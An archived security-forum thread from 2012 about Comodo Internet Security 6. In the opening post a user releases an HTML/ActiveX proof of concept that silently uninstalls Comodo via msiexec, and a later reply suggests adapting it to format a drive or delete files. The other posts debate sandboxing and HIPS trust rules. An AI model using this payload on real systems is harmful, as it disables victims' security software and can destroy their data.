Comodo Internet Security 6.xx Thread

Discussion in 'other anti-malware software' started by Mops21, Oct 10, 2012.

Thread Status:
Not open for further replies.
  1. Shaoran

    Shaoran Registered Member

    Joined:
    May 27, 2010
    Posts:
    8
    Unsafe but as IE is safe, CIS let him do what he wants.

    Online Armor too and lot of other.

    Want a try, I'm releasing it.

    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

    <html>
    <head>
    <script language="JavaScript" type="text/javascript">

    function run()
    {
    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
    }

    </script>
    </head>
    <input type="button" value="Lancer" onclick="run()">
    </body>
    </html>

    Make sure {E62381A7-B1C1-4121-8262-84D38C77786C} is the same as your CIS installation, you can see it by editing your uninstall link on start list.


    Lamest code don't you think ?

    As already know, Comodo's staff will fix this as they do for my first try with java, but I already have other way to show this. I don't think someone will understand my point of view one day.
     
  2. guest

    guest Guest

    Bravo!! a bug!!, yeah men it's better if you don'r report it. :cool:
     
  3. siketa

    siketa Registered Member

    Joined:
    Oct 25, 2012
    Posts:
    2,718
    Location:
    Gaia
    It's not a bug...it's a black hole!
    :eek:
     
  4. Shaoran

    Shaoran Registered Member

    Joined:
    May 27, 2010
    Posts:
    8
    As I'm not working for Comodo, I won't report all bugs for all applications in whitelist. I hope you understand that I have a life and no time for this. So I keep it only to show that report each bug doesn't matter as you can found one another easily.
     
  5. guest

    guest Guest

    o_O It's a bug, and according to him many other security software also has it (maybe all of them xD). But as always Comodo is the best target I wonder why.

    His point of view is that he is a misunderstood, and that he can kill almost any security app with a ~ Snipped as per TOS ~ code, false sense of security....
     
    Last edited by a moderator: Nov 30, 2012
  6. Shaoran

    Shaoran Registered Member

    Joined:
    May 27, 2010
    Posts:
    8
    Let me explain myself why.

    First, It wasn't my intention to show this hole, Vigen just ask me to. For information I made it 2 years ago, I only change the bold part.
    Second, It's more easy with Comodo cause OA is hard to kill in comparison. With It, I can only launch a program but not kill him directly or like here, uninstall it easily. Sure if you want I can ask to Vigen to make a new video for OA just to show I can install something throw it protection.
     
    Last edited by a moderator: Nov 30, 2012
  7. Shaoran

    Shaoran Registered Member

    Joined:
    May 27, 2010
    Posts:
    8
  8. guest

    guest Guest

    Well this is the answer of person not registered in wilders

     
  9. Noob

    Noob Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    6,491
    What are the new features in CIS 6? :D
     
  10. wasgij6

    wasgij6 Registered Member

    Joined:
    Mar 29, 2011
    Posts:
    321
    A new bug fix build has been released

     
  11. siketa

    siketa Registered Member

    Joined:
    Oct 25, 2012
    Posts:
    2,718
    Location:
    Gaia
    It has been released a week ago. :rolleyes:
     
  12. KelvinW4

    KelvinW4 Registered Member

    Joined:
    Oct 11, 2011
    Posts:
    1,199
    Location:
    Los Angeles, California
    Not really, it was released yesterday.
     
  13. a256886572008

    a256886572008 Registered Member

    Joined:
    Oct 26, 2007
    Posts:
    103
    1. It can be blocked by the sandboxed browser only.

    2. Virtual kiosk (including the virtualized browser) is more secure than the behavior blocker and the HIPS.
     

    Attached Files:

  14. Kees1958

    Kees1958 Registered Member

    Joined:
    Jul 8, 2006
    Posts:
    5,857
    Dynamic code execution through plug-ins by trusted parent proces and code included in data formats, increases complexity of "monitoring" all attack vectors. Sandboxing and rights containment are the way to go (with inheritance of restrictions), since it reduces the attack surface.

    Have to say that you turned the execution conditions a bit, but to kill a protection layer with its own uninstaller, turned a smile on my face and certainly is a creative idea. :D
     
    Last edited: Dec 1, 2012
  15. siketa

    siketa Registered Member

    Joined:
    Oct 25, 2012
    Posts:
    2,718
    Location:
    Gaia
    Yeah....my bad....i was reading posts on smartphone and it seemed messed up...
     
  16. andyman35

    andyman35 Registered Member

    Joined:
    Nov 2, 2007
    Posts:
    2,336
    The most valid sentence in this thread bar none.:thumb:

    The idea of allowing a web browser any more access/rights than are functionally necessary is just crazy to me.
     
  17. EboO

    EboO Registered Member

    Joined:
    Mar 12, 2011
    Posts:
    287
    Agree with Andyman.
    Defensewall doesn't fail this test because of untrusted status of navigator. I don't understand the point of view of comodo, too many permissions for applications. It's probably easiest to whitelist apps by allowing everything than create specifics rules. But it isn't very hard to create rules specifically for navigators.
     
  18. guest

    guest Guest

    1st You can make detailed rules for each app with Comodo. Or you can activate the paranoid mode. There is no HIPS in the market with detailed predefined rules for each app.

    2nd You can use Comodo sandbox for the browser or use kiosk, so all your problems are solved.

    3rd even if the app is trusted does not mean that can do anything in the computer, the hips is still active to alert about any dangerous movement.
     
    Last edited by a moderator: Dec 5, 2012
  19. EboO

    EboO Registered Member

    Joined:
    Mar 12, 2011
    Posts:
    287
    BB will be more effective in v6, so i fear it doesn't solde the problem.

    The security hole is present even if application is sandboxed. I don't know for the kiosk.
    Your third point is false : a trusted application can uninstall comodo, without any alert... Don't you think it's a problem ?
    Is it too hard to accept comodo being as others security products ?
     
  20. guest

    guest Guest

    BB has nothing to do with this, in fact there is no BB in CISv6 yet.

    I don't think so:

    and my 3rd point is true
    http://forums.comodo.com/defense-sa...plication-yet-blocked-by-comodo-t74504.0.html
     
    Last edited by a moderator: Dec 5, 2012
  21. EboO

    EboO Registered Member

    Joined:
    Mar 12, 2011
    Posts:
    287
    If your 3rd point is true can you explain why cis is uninstalled without any alert of comodo when script is launched ?
     
  22. guest

    guest Guest

    Again?
    It's explained in the quoted paragraph in my last post.
    According with the author he can uninstall and kill almost any security app with that...
    Copy and paste the code in a txt file and change the extension to html. IE blocks it and gives you 3 alerts (popups) to avoid to execute the ActiveX. Then the other problem is that the Key that he mentions "{E62381A7-B1C1-4121-8262-84D38C77786C}" is always the same in each CIS installation or is different? Seems that you have to change it to match you CIS uninstaller so it's completely useless.

    I don't have CIS installed but you can try and see what happens in the sandbox even if you allow the popup 3 times in IE.

    Look at the code (only works in IE), it's just an uninstaller in silent mode, this can be done to any app (if the attacker knows the key) in the computer.
    You can change the code to do a "format d:" or delete any file/folder in the computer.
     
    Last edited by a moderator: Dec 5, 2012
  23. EboO

    EboO Registered Member

    Joined:
    Mar 12, 2011
    Posts:
    287
    Sandbox doesn't protect against this security hole. A second video shows comodo fail with ie sandboxed.
     
  24. guest

    guest Guest

    What security hole? The IE security hole that warn you with 3 popups about how dangerous is to run the activeX and has to be personalize for every pc?

    What video?
     
    Last edited by a moderator: Dec 5, 2012
  25. The Red Moon

    The Red Moon Registered Member

    Joined:
    May 17, 2012
    Posts:
    4,101
    As a point of interest the comodo sandbox is not a true isolation sandbox in that sense.It is more a restrictive policy component.Things can still run but in a restricted way.
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.